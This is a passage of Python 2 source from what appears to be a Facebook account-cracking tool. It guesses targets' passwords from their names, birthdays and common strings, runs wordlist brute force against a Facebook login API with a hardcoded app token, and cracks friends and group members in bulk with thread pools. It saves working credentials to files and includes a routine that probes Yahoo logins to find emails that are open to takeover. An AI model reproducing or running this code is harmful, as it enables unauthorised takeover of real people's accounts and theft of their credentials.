elif hack =="3":
super()
elif hack =="4":
brute()
elif hack =="5":
menu_yahoo()
elif hack =="0":
menu()
else:
print "\033[1;91m[!] Wrong input"
hack_pilih()
##### MINI HF #####
def mini():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;97m[\033[1;91mINFO\033[1;97m] \033[1;91mThe target account must be friends\n with your account first!"
print 42*"\033[1;97m═"
try:
id = raw_input("\033[1;91m[+] \033[1;92mTarget ID \033[1;91m:\033[1;97m ")
jalan('\033[1;91m[✺] \033[1;92mWait a minute \033[1;97m...')
r = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
a = json.loads(r.text)
print '\033[1;91m[➹] \033[1;92mName\033[1;97m : '+a['name']
jalan('\033[1;91m[+] \033[1;92mCheck \033[1;97m...')
time.sleep(2)
jalan('\033[1;91m[+] \033[1;92mOpen password \033[1;97m...')
time.sleep(2)
print 42*"\033[1;97m═"
pz1 = a['first_name']+'123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz1
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz1
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
pz2 = a['first_name'] + '12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz2
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz2
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
pz3 = a['last_name'] + '123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz3
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz3
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
lahir = a['birthday']
pz4 = lahir.replace('/', '')
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz4
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz4
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
lahirs = a['birthday']
gaz = lahirs.replace('/', '')
pz5 = a['first_name']+gaz
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz5
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz5
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
pz6 = "kontol123"
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz6
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz6
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
pz7 = "sayang123"
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz7)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz7
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz6
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
print "\033[1;91m[!] Sorry, failed to open the target password :("
print "\033[1;91m[!] try it another way."
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
except KeyError:
print "\033[1;91m[!] Terget not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
##### Multi Brute Force #####
##### CRACK ####
def crack():
global idlist,passw,file
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
idlist = raw_input('\033[1;91m[+] \033[1;92mFile ID \033[1;91m: \033[1;97m')
passw = raw_input('\033[1;91m[+] \033[1;92mPassword \033[1;91m: \033[1;97m')
try:
file = open((idlist), "r")
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
for x in range(40):
zedd = threading.Thread(target=scrak, args=())
zedd.start()
threads.append(zedd)
for zedd in threads:
zedd.join()
except IOError:
print ("\033[1;91m[!] File not found")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
def scrak():
global berhasil,cekpoint,gagal,back,up
try:
os.mkdir('out')
except OSError:
pass
try:
buka = open(idlist, "r")
up = buka.read().split()
while file:
username = file.readline().strip()
url = "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(username)+"&locale=en_US&password="+(passw)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6"
data = urllib.urlopen(url)
mpsh = json.load(data)
if back == (len(up)):
break
if 'access_token' in mpsh:
bisa = open("out/mbf_ok.txt", "w")
bisa.write(username+"|"+passw+"\n")
bisa.close()
x = requests.get("https://graph.facebook.com/"+username+"?access_token="+mpsh['access_token'])
z = json.loads(x.text)
berhasil.append("\033[1;97m[ \033[1;92mOK✓\033[1;97m ] "+username+"|" +passw+" =>"+z['name'])
elif 'www.facebook.com' in mpsh["error_msg"]:
cek = open("out/mbf_cp.txt", "w")
cek.write(username+"|"+passw+"\n")
cek.close()
cekpoint.append("\033[1;97m[ \033[1;93mCP✚\033[1;97m ] "+username+"|" +passw)
else:
gagal.append(username)
back +=1
sys.stdout.write('\r\033[1;91m[\033[1;96m✸\033[1;91m] \033[1;92mCrack \033[1;91m:\033[1;97m '+str(back)+' \033[1;96m>\033[1;97m '+str(len(up))+' =>\033[1;92mLive\033[1;91m:\033[1;96m'+str(len(berhasil))+' \033[1;97m=>\033[1;93mCheck\033[1;91m:\033[1;96m'+str(len(cekpoint)));sys.stdout.flush()
except IOError:
print"\n\033[1;91m[!] Sleep"
time.sleep(1)
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
def hasil():
print
print 42*"\033[1;97m═"
###Berhasil
for b in berhasil:
print(b)
###CEK
for c in cekpoint:
print(c)
###Gagal
print 42*"\033[1;97m═"
print ("\033[31m[x] Failed \033[1;97m--> " + str(len(gagal)))
keluar()
############### SUPER MBF ################
def super():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;95m║--\033[1;91m> \033[1;96m1.\033[1;93m Crack with list friend"
print "\033[1;95m║--\033[1;91m> \033[1;96m2.\033[1;93m Crack from friend"
print "\033[1;95m║--\033[1;91m> \033[1;96m3.\033[1;93m Crack from member group"
print "\033[1;95m║--\033[1;91m> \033[1;96m0.\033[1;93m Back"
print "║"
pilih_super()
def pilih_super():
peak = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if peak =="":
print "\033[1;91m[!] Wrong input"
pilih_super()
elif peak =="1":
os.system('reset')
print logo
jalan('\033[1;94m[✺] \033[1;96mGet all friend id \033[1;95m...')
r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif peak =="2":
os.system('reset')
print logo
idt = raw_input("\033[1;91m[+] \033[1;92mInput ID friend \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;91m[!] Friend not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
super()
jalan('\033[1;91m[✺] \033[1;92mGet all id from friend \033[1;97m...')
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif peak =="3":
os.system('reset')
print logo
idg=raw_input('\033[1;91m[+] \033[1;92mInput ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+idg+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
super()
jalan('\033[1;91m[✺] \033[1;92mGet group member id \033[1;97m...')
re=requests.get('https://graph.facebook.com/'+idg+'/members?fields=name,id&limit=999999999&access_token='+toket)
s=json.loads(re.text)
for p in s['data']:
id.append(p['id'])
elif peak =="0":
menu_hack()
else:
print "\033[1;91m[!] Wrong input"
pilih_super()
print "\033[1;91m[+] \033[1;92mTotal ID \033[1;91m: \033[1;97m"+str(len(id))
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;91m[\033[1;96m✸\033[1;91m] \033[1;92mCrack \033[1;97m"+o),;sys.stdout.flush();time.sleep(1)
print
print 42*"\033[1;97m═"
##### crack #####
def main(arg):
global cekpoint,oks
user = arg
try:
os.mkdir('out')
except OSError:
pass
try:
#Pass1
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass1 = b['first_name']+'123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;93m[ \033[1;93mOK✓\033[1;93m ] "+user+" 😁 " +pass1+" =>"+z['name'])
oks.append(user+pass1)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass1+"\n")
cek.close()
cekpoint.append(user+pass1)
else:
#Pass2
pass2 = b['first_name']+'12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;93m[ \033[1;93mOK✓\033[1;93m ] "+user+" 😁 " +pass2+" =>"+z['name'])
oks.append(user+pass2)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass2+"\n")
cek.close()
cekpoint.append(user+pass2)
else:
#Pass3
pass3 = b['last_name'] + '123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;93m[ \033[1;93mOK✓\033[1;93m ] "+user+" 😁 " +pass3+" =>"+z['name'])
oks.append(user+pass3)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass3+"\n")
cek.close()
cekpoint.append(user+pass3)
else:
#Pass4
lahir = b['birthday']
pass4 = lahir.replace('/', '')
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;93m[ \033[1;93mOK✓\033[1;93m ] "+user+" 😁 " +pass4+" =>"+z['name'])
oks.append(user+pass4)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass4+"\n")
cek.close()
cekpoint.append(user+pass4)
else:
#Pass5
pass5 = "sayang123"
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;93m[ \033[1;93mOK✓\033[1;93m ] "+user+" 😁 " +pass5+" =>"+z['name'])
oks.append(user+pass5)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass5+"\n")
cek.close()
cekpoint.append(user+pass5)
else:
#Pass6
pass6 = "kontol123"
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;93m[ \033[1;93mOK✓\033[1;93m ] "+user+" 😁 " +pass6+" =>"+z['name'])
oks.append(user+pass6)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass6+"\n")
cek.close()
cekpoint.append(user+pass6)
else:
#Pass7
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass7 = b['first_name']+'doraemon321'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass7)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;93m[ \033[1;93mOK✓\033[1;93m ] "+user+" 😁 " +pass7+" =>"+z['name'])
oks.append(user+pass7)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass7+"\n")
cek.close()
cekpoint.append(user+pass7)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print 42*"\033[1;97m═"
print '\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mDone \033[1;97m....'
print"\033[1;91m[+] \033[1;92mTotal OK/CP \033[1;91m: \033[1;92m"+str(len(oks))+"\033[1;97m/\033[1;93m"+str(len(cekpoint))
print("\033[1;91m[+] \033[1;92mCP File saved \033[1;91m: \033[1;97mout/super_cp.txt")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
super()
######################################################
##### BRUTE FORCE #####
def brute():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
try:
email = raw_input("\033[1;91m[+] \033[1;92mID\033[1;97m/\033[1;92mEmail\033[1;97m/\033[1;92mHp \033[1;97mTarget \033[1;91m:\033[1;97m ")
passw = raw_input("\033[1;91m[+] \033[1;92mWordlist \033[1;97mext(list.txt) \033[1;91m: \033[1;97m")
total = open(passw,"r")
total = total.readlines()
print 42*"\033[1;97m═"
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mTarget \033[1;91m:\033[1;97m "+email
print "\033[1;91m[+] \033[1;92mTotal\033[1;96m "+str(len(total))+" \033[1;92mPassword"
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
sandi = open(passw,"r")
for pw in sandi:
try:
pw = pw.replace("\n","")
sys.stdout.write("\r\033[1;91m[\033[1;96m✸\033[1;91m] \033[1;92mCrack \033[1;91m: \033[1;97m"+pw)
sys.stdout.flush()
data = requests.get("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(email)+"&locale=en_US&password="+(pw)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
dapat = open("Brute.txt", "w")
dapat.write(email+" | "+pw+"\n")
dapat.close()
print "\n\033[1;91m[+] \033[1;92mFound"
print 42*"\033[1;97m═"
print("\033[1;91m[➹] \033[1;92mUsername \033[1;91m:\033[1;97m "+email)
print("\033[1;91m[➹] \033[1;92mPassword \033[1;91m:\033[1;97m "+pw)
keluar()
elif 'www.facebook.com' in mpsh["error_msg"]:
ceks = open("Brutecekpoint.txt", "w")
ceks.write(email+" | "+pw+"\n")
ceks.close()
print "\n\033[1;91m[+] \033[1;92mFound"
print 42*"\033[1;97m═"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print("\033[1;91m[➹] \033[1;92mUsername \033[1;91m:\033[1;97m "+email)
print("\033[1;91m[➹] \033[1;92mPassword \033[1;91m:\033[1;97m "+pw)
keluar()
except requests.exceptions.ConnectionError:
print"\033[1;91m[!] Connection Error"
time.sleep(1)
except IOError:
print ("\033[1;91m[!] File not found")
tanyaw()
def tanyaw():
why = raw_input("\033[1;91m[?] \033[1;92mCreate wordlist ? \033[1;92m[y/n]\033[1;91m:\033[1;97m ")
if why =="":
print "\033[1;91m[!] Wrong"
tanyaw()
elif why =="y":
wordlist()
elif why =="Y":
wordlist()
elif why =="n":
menu_hack()
elif why =="N":
menu_hack()
else:
print "\033[1;91m[!] Wrong"
tanyaw()
##### YAHOO CHECKER #####
#---------------------------------------------------#
def menu_yahoo():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;97m║--\033[1;91m> \033[1;92m1.\033[1;97m With list friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m2.\033[1;97m Clone from friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m3.\033[1;97m Clone from member group"
print "\033[1;97m║--\033[1;91m> \033[1;92m4.\033[1;97m Using file"
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
yahoo_pilih()
#----pilih
def yahoo_pilih():
go = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if go =="":
print "\033[1;91m[!] Wrong"
yahoo_pilih()
elif go =="1":
yahoofriends()
elif go =="2":
yahoofromfriends()
elif go =="3":
yahoomember()
elif go =="4":
yahoolist()
elif go =="0":
menu_hack()
else:
print "\033[1;91m[!] Wrong"
yahoo_pilih()
##### LIST FRIEND #####
def yahoofriends():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('reset')
print logo
mpsh = []
jml = 0
jalan('\033[1;91m[✺] \033[1;92mGetting email friend \033[1;97m...')
teman = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
kimak = json.loads(teman.text)
save = open('out/MailVuln.txt','w')
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print("\033[1;97m[ \033[1;92mVULN✓\033[1;97m ] \033[1;92m" +mail+" \033[1;97m=>"+nama)
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;97m═"
print '\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mDone \033[1;97m....'
print"\033[1;91m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;91m[+] \033[1;92mFile saved \033[1;91m:\033[1;97m out/MailVuln.txt"
save.close()
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
##### CLONE FROM FRIEND #####
def yahoofromfriends():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('reset')
print logo
mpsh = []
jml = 0
idt = raw_input("\033[1;91m[+] \033[1;92mInput ID friend \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;91m[!] Friend not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
jalan('\033[1;91m[✺] \033[1;92mGetting email from friend \033[1;97m...')
teman = requests.get('https://graph.facebook.com/'+idt+'/friends?access_token='+toket)
kimak = json.loads(teman.text)
save = open('out/FriendMailVuln.txt','w')
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print("\033[1;97m[ \033[1;92mVULN✓\033[1;97m ] \033[1;92m" +mail+" \033[1;97m=>"+nama)
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;97m═"
